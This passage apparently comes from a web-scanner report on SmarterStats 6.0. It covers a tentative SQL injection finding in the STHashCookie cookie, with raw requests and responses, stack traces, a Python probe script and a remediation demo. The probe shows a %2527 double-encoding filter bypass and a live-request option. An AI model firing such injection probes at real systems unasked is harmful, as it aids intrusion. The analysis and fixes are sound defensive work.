&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteResult&gt;
&lt;/GetSiteResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetSite?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/SiteInfoResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetSite HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/SiteInfoResult&gt;</pre>
</span>

</span>









</body>
</html>

2.10. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STHashCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STHashCookie cookie (double URL-encoded as %2527, see Request 1 below) and a general error message was returned (HTTP 500). Two single quotes were then submitted (%2527%2527, Request 2) and the error message disappeared (HTTP 200). You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

In this case the error message is not a database error. The 500 page is titled "Collection was modified; enumeration operation may not execute." (System.InvalidOperationException), and its stack trace places the exception in System.Xml.Serialization.XmlSchemas.Compile under ASP.defaultwsdlhelpgenerator_aspx.Page_Load, i.e. while ASP.NET generates the .asmx help page for ?op=MoveSite2, with no data-access frame anywhere in the trace. The quote / double-quote differential therefore matches the scanner's heuristic, but on its own it is not evidence that the cookie value reaches a SQL query; an exception of this kind in the help-page generator is equally consistent with the page being built while another scanner request was in flight, which is why the confidence is Tentative. Confirm manually (for example with boolean- or time-based payloads in the cookie against a request that is not a help page) before treating this as SQL injection.

The application attempts to block SQL injection attacks, but this can be circumvented by double URL-encoding the blocked characters, for example by submitting %2527 instead of the ' character.
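The following script reproduces the quote / double-quote differential against the STHashCookie cookie and triages the result the way the paragraph above recommends. It is an added example, not code from the original report or from SmarterTools. The host, path, cookie and session values are copied from Request 1 and Request 2 of this finding; the database error signatures, the transport interface and the two captured-response stand-ins (the title and one stack frame of each response, constructed here so the logic runs offline) are assumptions of this example.

```python
import http.client
import re
from urllib.parse import quote

# Values taken from Request 1 / Request 2 of this finding.
HOST = "vulnerable.smarterstats.6.0.host:9999"
PATH = "/Services/SiteAdmin.asmx?op=MoveSite2"
BASE_COOKIE = '{"CountsGuid":"727517837","TopBarSection":"AdminManage"}'
SESSION_ID = "ijbzrxuei0fhzn5qh4jllhd4"

# Signatures of genuine database errors (assumed list).  A 500 that matches
# none of these is a server exception, not proof that input reached SQL.
DB_ERROR_PATTERNS = (
    r"Unclosed quotation mark",                 # SQL Server
    r"Incorrect syntax near",                   # SQL Server
    r"System\.Data\.SqlClient\.SqlException",   # .NET SQL Server provider
    r"You have an error in your SQL syntax",    # MySQL
    r"ORA-\d{5}",                               # Oracle
    r"syntax error at or near",                 # PostgreSQL
)


def double_encode(payload):
    """' -> %27 -> %2527.  The web server decodes once (giving %27); only a
    second, application-level decode turns the value back into a quote."""
    return quote(quote(payload, safe=""), safe="")


def build_request(payload):
    """Request shaped like Request 1/2 above, payload appended to STHashCookie."""
    cookie = ("SelectedLanguage=; STTTState=; "
              f"STHashCookie={BASE_COOKIE}{double_encode(payload)}; "
              f"ASP.NET_SessionId={SESSION_ID}; loginsettings=;")
    return {"method": "GET", "path": PATH,
            "headers": {"Host": HOST, "Accept": "*/*", "Connection": "close",
                        "Cookie": cookie}}


def classify(status, body):
    """'database-error', 'server-exception' (5xx, no DB signature) or 'ok'."""
    if any(re.search(p, body) for p in DB_ERROR_PATTERNS):
        return "database-error"
    if status >= 500:
        return "server-exception"
    return "ok"


def page_title(body):
    m = re.search(r"<title>\s*(.*?)\s*</title>", body, re.S)
    return m.group(1) if m else ""


def differential_probe(send):
    """send(request_dict) -> (status, body).  One quote, then two quotes, read
    the way the scanner reads them, except that a SQL verdict also needs a
    database error signature in the first response."""
    s1, b1 = send(build_request("'"))
    s2, b2 = send(build_request("''"))
    c1, c2 = classify(s1, b1), classify(s2, b2)
    if c1 == "database-error" and c2 == "ok":
        verdict = "sql-injection-likely"
    elif c1 == "server-exception" and c2 == "ok":
        verdict = "error-differential-only"   # confirm by hand before reporting
    else:
        verdict = "no-differential"
    return {"verdict": verdict,
            "first": (s1, c1, page_title(b1)),
            "second": (s2, c2, page_title(b2))}


def send_live(req):
    """Real transport (plain HTTP, as in the report).  Not used offline."""
    conn = http.client.HTTPConnection(HOST, timeout=10)
    conn.request(req["method"], req["path"], headers=req["headers"])
    resp = conn.getresponse()
    return resp.status, resp.read().decode("utf-8", "replace")


# Constructed stand-ins for Response 1 and Response 2 of this finding (title
# plus one stack frame of each captured page), so the logic runs offline.
CAPTURED_500 = (500, "<html><head><title>Collection was modified; enumeration "
                     "operation may not execute.</title></head><body>"
                     "System.InvalidOperationException at "
                     "System.Xml.Serialization.XmlSchemas.Compile</body></html>")
CAPTURED_200 = (200, "<html><head><title>\n   SiteAdmin Web Service\n</title>"
                     "</head><body>MoveSite2</body></html>")


def send_from_capture(req):
    """Answers like the report: 500 for one quote, 200 for two quotes."""
    return CAPTURED_200 if "%2527%2527" in req["headers"]["Cookie"] else CAPTURED_500


if __name__ == "__main__":
    print(differential_probe(send_from_capture))
```

Run against the captured responses the verdict is "error-differential-only": the status codes differ exactly as the scanner saw, but the first response carries no database error signature, so the finding stays tentative until it is confirmed by other means. Replace send_from_capture with send_live to repeat the two requests against a test instance.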

Remediation detail

There is probably no need to perform a second URL-decode of the value of the STHashCookie cookie, as the web server (here ASP.NET) will already have carried out one decode; a value that still contains %27 after that decode should be treated as the literal characters %27, not decoded again. If a custom canonicalisation step is genuinely required, the application must perform its input validation after it, never before. Character blocking is in any case only a secondary control: if the cookie value is used in a database query, the query should be parameterised so that a quote in the data cannot alter the statement.
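The following added example (not SmarterStats code, and the validator, forbidden-character list and the sections table are constructed stand-ins) shows the three handling patterns side by side: validate-then-decode, which %2527 slips past; decode-once; and canonicalise-then-validate. It goes one step beyond the remediation text by also showing, with an in-memory SQLite table, why a string-built query fails on one quote but not on two, which is exactly the differential the scanner looks for, and how a bound parameter removes the problem regardless of what the validator lets through.

```python
import sqlite3
from urllib.parse import unquote

# Characters the (hypothetical) cookie validator refuses.
FORBIDDEN = ("'", '"', ";", "--")


def server_decode(raw_cookie_value):
    """The one percent-decode the web server / framework performs before the
    application sees the value."""
    return unquote(raw_cookie_value)


def has_forbidden(value):
    return any(token in value for token in FORBIDDEN)


def handle_validate_then_decode(raw):
    """The weak pattern: validate, then perform a custom second decode.
    %2527 arrives as %27, passes the check, and becomes a quote afterwards."""
    value = server_decode(raw)
    if has_forbidden(value):
        return ("rejected", value)
    value = unquote(value)            # custom second decode, after validation
    return ("accepted", value)


def handle_decode_once(raw):
    """Fix 1: no second decode.  %27 left after the server's decode is data."""
    value = server_decode(raw)
    if has_forbidden(value):
        return ("rejected", value)
    return ("accepted", value)


def handle_canonicalise_then_validate(raw):
    """Fix 2: if a second decode is genuinely required, do all canonicalisation
    first and validate the final form."""
    value = unquote(server_decode(raw))
    if has_forbidden(value):
        return ("rejected", value)
    return ("accepted", value)


# Character blocking is only a secondary control.  If the value reaches a
# query, parameterisation is what actually prevents injection.  The table is
# a constructed stand-in, not SmarterStats' schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sections (name TEXT)")
    conn.executemany("INSERT INTO sections VALUES (?)",
                     [("AdminManage",), ("Reports",)])
    return conn


def lookup_concatenated(conn, section):
    """String-built query: a stray quote changes the statement."""
    return conn.execute(
        f"SELECT name FROM sections WHERE name = '{section}'").fetchall()


def lookup_parameterised(conn, section):
    """Bound parameter: the quote stays inside the data."""
    return conn.execute(
        "SELECT name FROM sections WHERE name = ?", (section,)).fetchall()


def concatenation_breaks(conn, section):
    """True if the string-built query fails to parse for this input.  One
    quote leaves the literal unterminated; two quotes are an escaped quote,
    so the statement parses again: the scanner's quote / double-quote test."""
    try:
        lookup_concatenated(conn, section)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    for handler in (handle_validate_then_decode, handle_decode_once,
                    handle_canonicalise_then_validate):
        print(handler.__name__, handler("%2527"))
    db = make_db()
    print("one quote breaks concatenation:", concatenation_breaks(db, "AdminManage'"))
    print("two quotes break concatenation:", concatenation_breaks(db, "AdminManage''"))
    print("parameterised:", lookup_parameterised(db, "AdminManage'"))
```

With the raw cookie value %2527, the first handler accepts a bare quote, the second accepts the harmless literal %27, and the third rejects the request. The SQLite part shows the mechanism behind the scanner's heuristic: "AdminManage'" leaves the concatenated literal unterminated and raises, "AdminManage''" parses (the doubled quote is an escape) and returns no rows, while the parameterised lookup handles both without error.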

Request 1

GET /Services/SiteAdmin.asmx?op=MoveSite2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}%2527; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:36 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6785
Connection: Close

<html>
<head>
<title>Collection was modified; enumeration operation may not execute.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[InvalidOperationException]: Collection was modified; enumeration operation may not execute.
at System.Collections.Hashtable.HashtableEnumerator.MoveNext()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=MoveSite2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}%2527%2527; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:37 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 9415
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>MoveSite2</h2>
<p class="intro">Moves one site from one Server to another Server listed in the MRS and adds more than one log path.</p>

<h3>Test</h3>

The test form is only available for methods with primitive types as parameters.
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/MoveSite2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;MoveSite2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DestServerID&gt;<font class=value>int</font>&lt;/DestServerID&gt;
&lt;DestSmarterLogPath&gt;<font class=value>string</font>&lt;/DestSmarterLogPath&gt;
&lt;DestConfigLogPaths&gt;
&lt;ConfigLogLocation&gt;
&lt;LocationGUID&gt;<font class=value>string</font>&lt;/LocationGUID&gt;
&lt;FileWildcard&gt;<font class=value>string</font>&lt;/FileWildcard&gt;
&lt;MaxDays&gt;<font class=value>int</font>&lt;/MaxDays&gt;
&lt;FilePath&gt;<font class=value>string</font>&lt;/FilePath&gt;
&lt;/ConfigLogLocation&gt;
&lt;ConfigLogLocation&gt;
&lt;LocationGUID&gt;<font class=value>string</font>&lt;/LocationGUID&gt;
&lt;FileWildcard&gt;<font class=value>string</font>&lt;/FileWildcard&gt;
&lt;MaxDays&gt;<font class=value>int</font>&lt;/MaxDays&gt;
&lt;FilePath&gt;<font class=value>string</font>&lt;/FilePath&gt;
&lt;/ConfigLogLocation&gt;
&lt;/DestConfigLogPaths&gt;
&lt;DestExportPath&gt;<font class=value>string</font>&lt;/DestExportPath&gt;
&lt;DestExportPathURL&gt;<font class=value>string</font>&lt;/DestExportPathURL&gt;
&lt;CopyFiles&gt;<font class=value>boolean</font>&lt;/CopyFiles&gt;
&lt;/MoveSite2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;MoveSite2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;MoveSite2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/MoveSite2Result&gt;
&lt;/MoveSite2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;MoveSite2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DestServerID&gt;<font class=value>int</font>&lt;/DestServerID&gt;
&lt;DestSmarterLogPath&gt;<font class=value>string</font>&lt;/DestSmarterLogPath&gt;
&lt;DestConfigLogPaths&gt;
&lt;ConfigLogLocation&gt;
&lt;LocationGUID&gt;<font class=value>string</font>&lt;/LocationGUID&gt;
&lt;FileWildcard&gt;<font class=value>string</font>&lt;/FileWildcard&gt;
&lt;MaxDays&gt;<font class=value>int</font>&lt;/MaxDays&gt;
&lt;FilePath&gt;<font class=value>string</font>&lt;/FilePath&gt;
&lt;/ConfigLogLocation&gt;
&lt;ConfigLogLocation&gt;
&lt;LocationGUID&gt;<font class=value>string</font>&lt;/LocationGUID&gt;
&lt;FileWildcard&gt;<font class=value>string</font>&lt;/FileWildcard&gt;
&lt;MaxDays&gt;<font class=value>int</font>&lt;/MaxDays&gt;
&lt;FilePath&gt;<font class=value>string</font>&lt;/FilePath&gt;
&lt;/ConfigLogLocation&gt;
&lt;/DestConfigLogPaths&gt;
&lt;DestExportPath&gt;<font class=value>string</font>&lt;/DestExportPath&gt;
&lt;DestExportPathURL&gt;<font class=value>string</font>&lt;/DestExportPathURL&gt;
